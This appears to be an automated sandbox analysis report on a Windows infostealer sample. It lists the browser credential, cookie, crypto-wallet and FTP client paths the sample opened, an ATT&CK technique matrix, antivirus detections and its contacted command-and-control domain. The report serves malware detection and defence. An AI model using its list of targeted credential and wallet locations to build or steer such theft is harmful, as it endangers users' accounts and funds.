                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Yara matchFile source: 00000000.00000003.2244834702.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2197414052.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2274068822.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2271822071.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2221046223.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2195972655.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                11
                Process Injection
                34
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services4
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading
                11
                Process Injection
                LSASS Memory741
                Security Software Discovery
                Remote Desktop ProtocolData from Removable Media11
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                Obfuscated Files or Information
                Security Account Manager34
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets223
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                file.exe45%ReversingLabsWin32.Trojan.Symmi
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://atten-supporse.biz/apik0%Avira URL Cloudsafe
                https://atten-supporse.biz/api.0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                atten-supporse.biz
                104.21.16.9
                truefalse
                  high
                  www.google.com
                  172.217.21.36
                  truefalse
                    high
                    s-part-0035.t-0009.t-msedge.net
                    13.107.246.63
                    truefalse
                      high
                      js.monitor.azure.com
                      unknown
                      unknownfalse
                        high
                        mdec.nelreports.net
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://atten-supporse.biz/apifalse
                            high
                            https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_109.7.drfalse
                                high
                                https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_109.7.drfalse
                                      high
                                      https://www.linkedin.com/cws/share?url=$chromecache_88.7.dr, chromecache_101.7.drfalse
                                        high
                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://github.com/Youssef1313chromecache_109.7.drfalse
                                            high
                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_88.7.dr, chromecache_101.7.drfalse
                                                high
                                                https://aka.ms/msignite_docs_bannerchromecache_88.7.dr, chromecache_101.7.drfalse
                                                  high
                                                  https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_101.7.drfalse
                                                    high
                                                    http://polymer.github.io/AUTHORS.txtchromecache_88.7.dr, chromecache_101.7.drfalse
                                                      high
                                                      https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_109.7.drfalse
                                                        high
                                                        https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_88.7.dr, chromecache_101.7.drfalse
                                                          high
                                                          https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_109.7.drfalse
                                                            high
                                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://x1.i.lencr.org/0file.exe, 00000000.00000003.2245641075.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pshelpmechoosechromecache_88.7.dr, chromecache_101.7.drfalse
                                                                  high
                                                                  https://aka.ms/feedback/report?space=61chromecache_109.7.dr, chromecache_110.7.drfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2196170427.00000000057B8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196093820.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://learn-video.azurefd.net/vod/playerchromecache_88.7.dr, chromecache_101.7.drfalse
                                                                        high
                                                                        https://twitter.com/intent/tweet?original_referer=$chromecache_88.7.dr, chromecache_101.7.drfalse
                                                                          high
                                                                          https://github.com/gewarrenchromecache_109.7.drfalse
                                                                            high
                                                                            https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2246719404.00000000058C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://polymer.github.io/CONTRIBUTORS.txtchromecache_88.7.dr, chromecache_101.7.drfalse
                                                                                high
                                                                                https://www.mozilla.orfile.exe, 00000000.00000003.2246650108.00000000057CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://atten-supporse.biz/apikfile.exe, 00000000.00000003.2244834702.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2271822071.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221046223.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2247099968.0000000000E76000.00000004.00000020.00020000.00000000.sdmpfalse
